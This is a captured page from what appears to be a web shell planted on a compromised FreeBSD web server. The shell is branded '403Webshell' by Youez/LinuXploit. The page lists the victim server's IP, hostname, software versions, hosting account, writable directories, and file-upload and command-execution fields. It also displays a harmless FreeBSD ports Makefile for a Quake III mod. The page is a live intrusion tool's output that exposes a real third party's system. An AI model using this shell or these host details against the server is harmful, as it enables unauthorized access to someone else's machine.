403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/games/quake3-osp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/games/quake3-osp/Makefile
PORTNAME=	osp
PORTVERSION=	1.03a
CATEGORIES=	games
MASTER_SITES=	http://osp.dget.cc/orangesmoothie/downloads/
PKGNAMEPREFIX=	${Q3PKGNAMEPREFIX}
DISTNAME=	${PORTNAME}-Quake3-${PORTVERSION}_full

MAINTAINER=	ports@FreeBSD.org
COMMENT=	Quake III Arena mod: OSP Tourney DM/CA/CTF
WWW=		https://www.orangesmoothie.org/tourneyQ3A/

USES=		zip
NO_BUILD=	yes

WRKSRC=		${WRKDIR}/${PORTNAME}
DATADIR=	${Q3DIR}/${PORTNAME}

OPTIONS_DEFINE=	DOCS

.include "${.CURDIR}/../quake3-data/Makefile.include"
.include <bsd.port.options.mk>

post-extract:
# Replace outdated README file
	@${MV} ${WRKSRC}/README.txt ${WRKSRC}/Docs

do-install:
	@${MKDIR} ${STAGEDIR}${DATADIR}
.for f in *.cfg *.pk3 description.txt filters.txt
	${INSTALL_DATA} ${WRKSRC}/${f} ${STAGEDIR}${DATADIR}
.endfor
.for d in cfg-* locs vm
	${CP} -a ${WRKSRC}/${d} ${STAGEDIR}${DATADIR}
.endfor
	@${MKDIR} ${STAGEDIR}${DOCSDIR}
	${INSTALL_DATA} ${WRKSRC}/Docs/*.txt ${STAGEDIR}${DOCSDIR}
	${INSTALL_DATA} "${WRKSRC}/OSP Match Quick Start.txt" \
		${STAGEDIR}${DOCSDIR}/osp-match-quick-start.txt

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit